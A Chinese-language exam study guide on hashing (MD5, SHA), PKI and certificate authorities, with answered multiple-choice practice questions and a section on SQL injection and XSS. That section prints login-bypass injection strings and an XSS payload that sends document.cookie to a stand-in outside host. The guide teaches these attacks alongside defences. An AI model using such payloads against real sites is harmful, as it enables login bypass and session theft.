3、非可逆加密
非可逆加密,也称为单向加密或哈希加密,是一种在加密过程中不需要密钥,且加密后的数据无法被解密回原始数据的加密算法。
1)非可逆加密的主要特点
无需密钥:加密过程不需要密钥,仅通过算法本身即可将明文转换为密文。
不可逆性:加密后的数据(密文)无法被解密回原始数据(明文),即不存在有效的解密算法可以在有限时间内从密文恢复出明文。
应用广泛:常用于密码存储、文件校验、数字签名等领域,以确保数据的完整性和安全性。
2)常见非可逆加密算法
MD5
全称:Message-Digest Algorithm 5(信息-摘要算法5)。
特点:
定长输出:无论输入数据的长度如何,MD5算法都会生成一个128位(16字节)的散列值(哈希值)。
容易计算:从原始数据计算MD5值相对容易。
抗修改性:对原始数据的任何微小修改都会导致MD5值的显著变化。
抗碰撞性:虽然理论上存在碰撞的可能性(即两个不同的输入数据产生相同的MD5值),但在实际应用中这种情况非常罕见。
应用:由于MD5算法的安全性相对较低,且已被证明存在碰撞,因此不建议用于安全性要求较高的场合。然而,它仍然被广泛用于文件校验、下载验证等领域。
SHA
全称:Secure Hash Algorithm(安全散列算法)。
特点:
多种版本:SHA算法包括SHA-1、SHA-2(包括SHA-224、SHA-256、SHA-384、SHA-512等版本)、SHA-3等多个版本。其中,SHA-1已被证明存在安全漏洞,不再推荐使用;而SHA-2和SHA-3等较新版本则提供了更高的安全性。
更长的输出:与MD5相比,SHA算法生成的散列值更长(如SHA-256生成256位的散列值),因此更难于发生碰撞。
安全性更高:SHA算法在设计上考虑了更多的安全因素,因此比MD5算法更安全。
应用:SHA算法被广泛用于数字签名、文件校验、安全通信等领域,以确保数据的完整性和安全性。特别是在需要高安全性的场合(如金融、军事等领域),SHA算法是不可或缺的工具。
考点一:各种加密技术的特点
题目:下面关于加密的说法中,错误的是 (C)
A数据加密的目的是保护数据的机密性
B加密过程是利用密钥和加密算法将明文转换成密文的过程
C选择密钥和加密算法的原则是保证密文不可能被破解
D加密技术通常分为非对称加密技术和对称密钥
加密技术
解析:
尽管我们努力选择强大的加密算法和难以猜测的密钥,但在理论上,任何加密系统都有可能在足够的时间和资源下被破解。加密技术的目标是使得破解所需的时间和资源远远超过其潜在的价值,从而在实际应用中达到保护数据的目的。
十一、PKI
1、PKI
PKI(Public Key Infrastructure,公钥基础设施)是一个全面的安全框架,旨在使用公钥加密技术来管理密钥和证书。它是一套硬件、软件、策略、人员和程序的集合,用于创建、管理、分发、使用、存储和撤销数字证书以及相关的公钥加密密钥。PKI的核心目的是通过数字证书来验证通信双方的身份,确保数据传输的机密性、完整性和不可否认性。
PKI的主要组件包括:
证书授权机构(CA):CA是PKI中的核心实体,负责颁发和管理数字证书。CA在验证申请者的身份后,会为其生成一对公钥和私钥,并将公钥以及申请者的身份信息封装在数字证书中,然后使用CA的私钥对证书进行签名。
数字证书:数字证书是PKI中的关键元素,它包含了公钥持有者的身份信息、公钥本身以及CA的签名。数字证书用于在通信双方之间安全地传递公钥,并确保公钥的合法性和有效性。
注册机构(RA):RA是可选的组件,通常作为CA的前端,负责处理证书的申请、审核和注册等流程。RA可以减轻CA的负担,提高证书颁发的效率和准确性。
证书存储库:证书存储库用于存储已颁发的数字证书,以便用户或系统能够方便地检索和验证证书。证书存储库可以是本地的、远程的或分布式的。
证书撤销列表(CRL):CRL是CA发布的一个列表,用于列出已被撤销或失效的数字证书。用户在验证证书的有效性时,需要查询CRL以确认证书是否已被撤销。
在线证书状态协议(OCSP):OCSP是一种用于实时查询证书状态的协议。与CRL相比,OCSP可以提供更快的证书撤销检查速度,并减少网络带宽的占用。
2、私钥和公钥在加密过程中的作用
私钥用于签名:在数字签名过程中,发送方会使用其私钥对数据的摘要(通常是通过哈希函数生成的)进行加密,生成数字签名。这个签名随后与数据一起发送给接收方。接收方可以使用发送方的公钥来验证签名的真实性,从而确认数据确实由发送方发送且未被篡改。
公钥用于加密:在加密通信过程中,发送方会使用接收方的公钥对数据进行加密。只有拥有对应私钥的接收方才能解密数据,从而确保数据在传输过程中的机密性。然而,请注意,在实际应用中,由于公钥加密通常比私钥加密更耗时,因此更常见的做法是使用公钥加密一个对称密钥(称为会话密钥),然后使用这个对称密钥来加密实际传输的数据。
考点一: CA的作用
题目:甲怀疑乙发给他的信息已遭人篡改,同时怀疑乙的公钥也是被人冒充的。为了消除甲的疑虑,甲、乙需要找一个双方都信任的第三方,即 (C) 来签发数字证书
A 注册中心RA
B 国家信息安全测评认证中心
C 认证中心CA
D 国际电信联盟ITU
考法二:签名/加密
题目:PKI体制中,保证数字证书不被篡改的方法是 (A)
A 用CA的私钥对数字证书签名
B 用CA的公钥对数字证书签名
C 用证书主人的私钥对数字证书签名
D 用证书主人的公钥对数字证书签名
解析:签名保证数据完整性,使数据不被篡改,加密保证
十二、SQL注入式攻击和XSS攻击
1、SQL注入
SQL注入式攻击(SQL Injection)是一种常见的网络攻击手段,它允许攻击者通过在Web表单输入或页面请求的查询字符串中插入或“注入”恶意的SQL命令,从而操控后台数据库。这些恶意的SQL命令可以被用来访问、修改或删除数据库中的数据,甚至可能获取对数据库服务器的完全控制权限。
SQL注入的工作原理
输入点:攻击者首先找到应用程序的输入点,这些点通常是用户输入表单、URL查询字符串、HTTP头部或任何可以将数据传递给后端数据库的地方。
构造恶意输入:攻击者构造一个包含SQL代码的恶意输入,这个输入被设计来绕过应用程序的安全措施,并执行恶意的SQL命令。
后端处理:当应用程序接收到这个恶意输入时,它会不加过滤或验证地将其嵌入到SQL查询中,并将该查询发送到数据库服务器执行。
执行恶意SQL命令:数据库服务器执行包含恶意SQL命令的查询,导致未授权的数据访问、数据泄露、数据篡改或数据库服务器被控制等后果。
SELECT * FROM users WHERE username = '$username' AND password = '$password'
示例1:使用单引号绕过验证
' OR '1'='1
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '$password'
由于'1'='1'总是为真,这个条件将忽略password字段的验证,允许攻击者绕过登录验证(假设数据库中存在至少一个用户)。
示例2:使用注释符绕过其他条件
' OR '1'='1' --
SELECT * FROM users WHERE username = '$username' AND password = '$password' AND is_active = 1
SELECT * FROM users WHERE username = '' OR '1'='1'
-- AND password = '$password' AND is_active = 1
由于--是注释的开始,所以AND password = '$password' AND is_active = 1部分被忽略了。
2、XSS攻击
XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的网络安全攻击方式,它允许攻击者在网页中嵌入恶意脚本(如JavaScript),当其他用户浏览这些网页时,这些脚本就会在用户的浏览器上执行。这些脚本可以执行多种恶意操作,比如窃取用户的会话令牌(cookies)、重定向用户到恶意网站、在用户的浏览器中显示广告等。
1)XSS攻击的类型
反射型XSS(Reflected XSS):
这是最常见的XSS类型之一。它发生在当应用接收输入(如查询参数、表单输入等),并在不经过适当过滤或编码的情况下,直接将输入数据嵌入到HTML响应中。
攻击者可以通过构造一个包含恶意脚本的URL,诱骗受害者点击该链接,当受害者的浏览器加载该URL时,恶意脚本就会执行。
存储型XSS(Stored XSS):
也被称为持久型XSS。在这种类型的攻击中,恶意脚本被永久地存储在目标服务器上,如数据库、消息论坛、访客留言本等。
每当有用户查看这些包含恶意脚本的内容时,脚本就会在用户的浏览器中执行。
基于DOM的XSS(DOM-based XSS):
这种类型的XSS不直接涉及服务器端的代码或数据。它发生在客户端脚本(如JavaScript)处理输入数据,并动态地修改DOM(文档对象模型)时。
如果这些脚本不正确地处理输入数据,就可能允许攻击者注入恶意脚本。
2)防御XSS攻击的措施
输入验证:
对所有输入数据进行严格的验证,拒绝或清理任何可疑的输入。
输出编码:
在将任何数据发送到浏览器之前,对其进行适当的HTML编码或JavaScript编码。这可以防止恶意脚本被浏览器解析和执行。
使用内容安全策略(CSP):
CSP是一个额外的安全层,用于减少XSS攻击的风险。通过指定哪些外部资源(如脚本、CSS样式表、图片等)是可信的,CSP可以帮助减少恶意内容的执行。
更新和维护:
定期更新和修补所有相关的软件和库,以确保已知的安全漏洞得到修复。
教育和培训:
对开发人员进行安全培训,使他们了解XSS攻击的原理和防御方法。
示例一:
http://bbs.xss.net/home?content=<script>alert("xss")</script>
在这个例子中,攻击者试图通过查询参数content注入一个<script>标签,该标签包含一个alert函数,用于在受害者的浏览器中弹出一个警告框,显示文本“xss”。虽然这个攻击本身可能看起来无害(只是显示了一个警告框),但它证明了攻击者能够执行JavaScript代码在受害者的浏览器上。
示例二:
http://www.xss.com?content=<script>window.open("http://www.xssl.com?param="+document.cookie)</script>
在这个例子中,攻击者试图通过查询参数content注入一个<script>标签,该标签包含一个window.open函数,该函数尝试打开一个新的浏览器窗口或标签页,指向http://www.xssl.com,并将受害者的document.cookie(包含会话令牌等敏感信息)作为查询参数附加到URL上。这样,攻击者就可能能够窃取受害者的会话令牌,进而执行更复杂的攻击,如会话劫持。